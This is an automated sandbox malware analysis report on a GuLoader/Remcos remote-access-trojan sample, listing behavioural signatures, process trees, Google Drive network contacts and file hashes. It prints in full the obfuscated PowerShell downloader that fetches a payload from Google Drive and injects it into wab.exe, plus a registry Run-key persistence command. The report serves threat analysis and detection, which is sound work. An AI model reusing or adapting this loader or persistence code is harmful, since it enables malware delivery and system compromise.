Malware Analysis Report

2025-01-02 03:20

Sample ID 240402-lz5y2ade8s
Target 12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.zip
SHA256 f5e9a12645109faa38afb7b1784f96a6355386098b83cc28fe166e36d2e707f4
Tags
guloader remcos remotehost downloader persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f5e9a12645109faa38afb7b1784f96a6355386098b83cc28fe166e36d2e707f4

Threat Level: Known bad

The file 12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.zip was found to be: Known bad.

Malicious Activity Summary

guloader remcos remotehost downloader persistence rat

Guloader,Cloudeye

Remcos

Blocklisted process makes network request

Checks computer location settings

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Program crash

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-02 09:59

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-02 09:59

Reported

2024-04-02 10:01

Platform

win7-20240221-en

Max time kernel

118s

Max time network

125s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Remcos

rat remcos

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\Biotron = "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\\kostbare\\').Storbyer;%Habilitcar% ($Assaults)" C:\Windows\SysWOW64\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 276 set thread context of 1860 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2876 wrote to memory of 1104 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 1104 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 1104 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1104 wrote to memory of 676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1104 wrote to memory of 676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1104 wrote to memory of 676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1104 wrote to memory of 276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1104 wrote to memory of 276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1104 wrote to memory of 276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1104 wrote to memory of 276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 276 wrote to memory of 1480 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 276 wrote to memory of 1480 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 276 wrote to memory of 1480 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 276 wrote to memory of 1480 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 276 wrote to memory of 1860 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 276 wrote to memory of 1860 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 276 wrote to memory of 1860 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 276 wrote to memory of 1860 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 276 wrote to memory of 1860 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 276 wrote to memory of 1860 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1860 wrote to memory of 1524 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1860 wrote to memory of 1524 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1860 wrote to memory of 1524 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1860 wrote to memory of 1524 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1524 wrote to memory of 2540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1524 wrote to memory of 2540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1524 wrote to memory of 2540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1524 wrote to memory of 2540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Biotron" /t REG_EXPAND_SZ /d "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\kostbare\').Storbyer;%Habilitcar% ($Assaults)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Biotron" /t REG_EXPAND_SZ /d "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\kostbare\').Storbyer;%Habilitcar% ($Assaults)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.178.1:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
GB 142.250.178.1:443 drive.usercontent.google.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 7b4fdea2a0af3dbb3e9af46780e69650
SHA1 de69a8afb30d505ddd396ef3a4e8a1f29a433365
SHA256 6b1fa76d82599968c89764e75052e8d79e5dd4b1b161729424cdc987c5c63b7b
SHA512 191950acaceeced7a8ad35f7c4e825e709088942b59b2d118b1b1b57fab6428a0247fe5528bcd55e5f2ec8fb64eb153152458db69f894c93a692bc42fe0f7820

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 114a16150326060e22136b52754269d6
SHA1 9922af44d5ae3aad88e7142110b374d62b1e286e
SHA256 430d09dee4de6ed578860cb29ce7bc18aa71cb3d7ecc3b74f6c34b018fbed64a
SHA512 10fcd67bfeaf39bc099ec43688c58c168067ea6690bf40ecf3163745ac9b3829b2a1f3075151580ee4d9162e41d0eb6114687a9a63aaff0ffbc5217306a9e232

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 ce31aad931645728cb11543a9cd80f8e
SHA1 3e04faa0eebb25e42df967a276d3ce916947adf9
SHA256 5e765d9805803b5190ecf3cb07505d8ddc2b45645240c0ce905ecbda3e46ab06
SHA512 07e2f610945bac67ded6f43b0422295fe5803aeb91b6e4208350bb197f27ee73340462969917e883e3a3aac60a34eb5c779802d9223b04b11010e761c198e5e7

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 c3b48e90f811fd16ef69026fdc4a2e50
SHA1 df10a00a6d68af91801d446d669b46e69fe8cc56
SHA256 4ebcc3f20194ee869ed413b7bbe7fc466ddced60b792e09b9ec70b906984ff0f
SHA512 7b6751535b2d2237d207236327f64f5281f02f2b70d08abc3a71f30ba4e0520f6f794eb275e75d7b1babf153d9d528eadf2ab07d1616fad17792ada0c2c53eda

memory/1104-261-0x000000001B810000-0x000000001BAF2000-memory.dmp

memory/1104-263-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

memory/1104-262-0x0000000000300000-0x0000000000308000-memory.dmp

memory/1104-264-0x0000000002BF0000-0x0000000002C70000-memory.dmp

memory/1104-265-0x0000000002BF0000-0x0000000002C70000-memory.dmp

memory/1104-266-0x0000000002BF0000-0x0000000002C70000-memory.dmp

memory/1104-267-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

memory/1104-268-0x0000000002BF0000-0x0000000002C70000-memory.dmp

memory/1104-269-0x0000000002980000-0x00000000029A2000-memory.dmp

memory/1104-270-0x00000000022A0000-0x00000000022B2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7ENQ859Z3E8CFSKT0PHQ.temp

MD5 938d11d152f7becaf03cc896662552e9
SHA1 7e4aff6bbc098c29f3df3330cf3fc5beb4d802af
SHA256 3bb781cfc9ce56808126b84acca7d4df37f287b5d9981650ffdc7a6c5bc117d5
SHA512 56c5fe221ceb2d97a84a830d7001877b9bbba8cd345709ba992c201908cc70f58144640c2429a8afe257c52d569a3e42d411ce2fc092711c62343ffad25eb1b0

memory/276-273-0x0000000073C20000-0x00000000741CB000-memory.dmp

memory/276-274-0x0000000002EA0000-0x0000000002EE0000-memory.dmp

memory/276-275-0x0000000073C20000-0x00000000741CB000-memory.dmp

memory/276-276-0x0000000002EA0000-0x0000000002EE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab447F.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f5ce70305a47d6a1e13d1fad04b92a29
SHA1 f806975d9555a6cf7b212339da5e41d2182d6f29
SHA256 f5f402b6d27bbd2511ac609c34f92198ff0bd77a9f599f7b7ad721b62fc60f2c
SHA512 60f118abae01336e9cf2be3020b17e1cee7b598889b5ffaed019a04bb33b805b7651938bcbf5bfebb7edc7589e733d37d756a57713da34d08b1c5a80a46715ad

memory/1104-288-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

memory/276-289-0x0000000002EA0000-0x0000000002EE0000-memory.dmp

memory/1104-290-0x0000000002BF0000-0x0000000002C70000-memory.dmp

